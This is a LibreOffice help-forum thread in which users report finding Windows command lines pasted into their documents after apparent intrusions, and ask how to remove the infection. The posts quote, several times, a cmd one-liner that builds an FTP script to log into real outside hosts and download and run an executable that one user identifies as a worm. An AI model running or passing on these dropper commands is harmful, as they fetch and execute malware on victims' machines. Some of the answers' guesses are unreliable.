asked 2012-09-04 22:58:58 +0200
This post is a wiki. Anyone with karma >750 is welcome to improve it.
I am on Ubuntu 12.04 and using LO 3.5.4
I woke up this morning to find this displayed on my PC in a LO write file:
2011-12 Governor 21 >> ik &echo user alizametal.com.tr hd611 >> ik &echo binary >> ik &echo get www/root.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &root.exe &exit echo You got owned
cmd /c echo open 89.19.29.116 21 >> ik &echo user alizametal.com.tr hd611 >> ik &echo binary >> ik &echo get www/root.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &root.exe &exit echo You got owned
cmd /c echo open 89.19.29.116 21 >> ik &echo user alizametal.com.tr hd611 >> ik &echo binary >> ik &echo get www/root.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &root.exe &exit echo You got owned
cmd /c echo open 89.19.29.116 21 >> ik &echo user alizametal.com.tr hd611 >> ik &echo binary >> ik &echo get www/root.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &root.exe &exit echo You got owned
cmd /c echo open 89.19.29.116 21 >> ik &echo user alizametal.com.tr hd611 >> ik &echo binary >> ik &echo get www/root.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &root.exe &exit echo You got owned
cmd /c echo open countx6.servegame.com 21 >> ik &echo user nobody lampp >> ik &echo binary >> ik &echo get system32.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &system32.exe &exit echo Windows has been updated.
Parts of this kept appearing in strange places on documents I was working on yesterday...I recognise some of it.
It is obviously some kind of Windows virus and is interfering with LO......
a) where does it hide b) how can I eliminate it c) how can I ensure it does not get passed on to Windows users?
answered 2012-09-05 07:19:05 +0200
This post is a wiki. Anyone with karma >750 is welcome to improve it.
The domain seems to be alizametal.com.tr, ( Trinidad I think )calling a websearch for root.exe ... I think it might be possible to pass on the file if it was to embed itself as a macro in LO. I found the following sites helpful: http://www.threatexpert.com/files/root.exe.html http://www.processlibrary.com/directory/files/root/21574/#.UEbeooqPXTY Now back to your original question, windows executables don't run in Ubuntu Linux. Unless there is something like wine available. But as long as you're not @root or su I think there is no issue. Did you login to Ubuntu forums for an answer there ? They have a free web based IRC where you can get lots of further input & experience.
I hope this helps
answered 2012-09-18 21:12:20 +0200
This post is a wiki. Anyone with karma >750 is welcome to improve it.
Dunbrokin: I woke up to almost the same thing today. I have an Ubuntu 12.04.1 fully updated Linux server (just updated yesterday) with the latest version of Virtualbox running Windows 7 (also fully updated). Windows 7 was running at the time.
Today, when I used remote desktop protocol to get on to my Windows 7 VM, I saw notepad was opened, with the following text:
cmd /c echo open countx6.servegame.com 21 >> ik &echo user nobody lampp >> ik &echo binary >> ik &echo get system32.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &system32.exe &exit echo Windows has been updated.
Needless to say, it scared the crap out of me. Who was on my system, and what were they trying to do? After inspecting everything, I realized that I had enabled the remote display in VirtualBox for my Windows 7 VM. VirtualBox does not use a password for the RDP service. I also noticed that the vino-server in Ubuntu had used uPnP to open port 5900 on my router. I figure this is how they got in.
I'm still not sure how the notepad was opened and if anyone was actually on my system or if it was just a script kiddie, but I turned off uPnP, disabled the remote desktop, and scanned the system for malware. Nothing was found.
Does anyone know how a remote attacker can open Notepad (or LibreOffice apparently) without being on the machine? I know a carefully crafted URL can accomplish the task, but how did our computers visit such a URL?
I was curios, so I ftp'd to countx6.servegame.com and downloaded system32.exe. It's signature from MS Security Essentials was Worm:Win32/Nayrabot.gen!A.
Scary stuff...
LibreOffice is made available by volunteers around the globe, backed by a charitable Foundation. Please support our efforts: Your donation helps us to deliver a better product!
Asked: 2012-09-04 22:58:58 +0200
Seen: 367 times
Last updated: Sep 18 '12
Content on this site is licensed under a Creative Commons Attribution Share Alike 3.0 license.
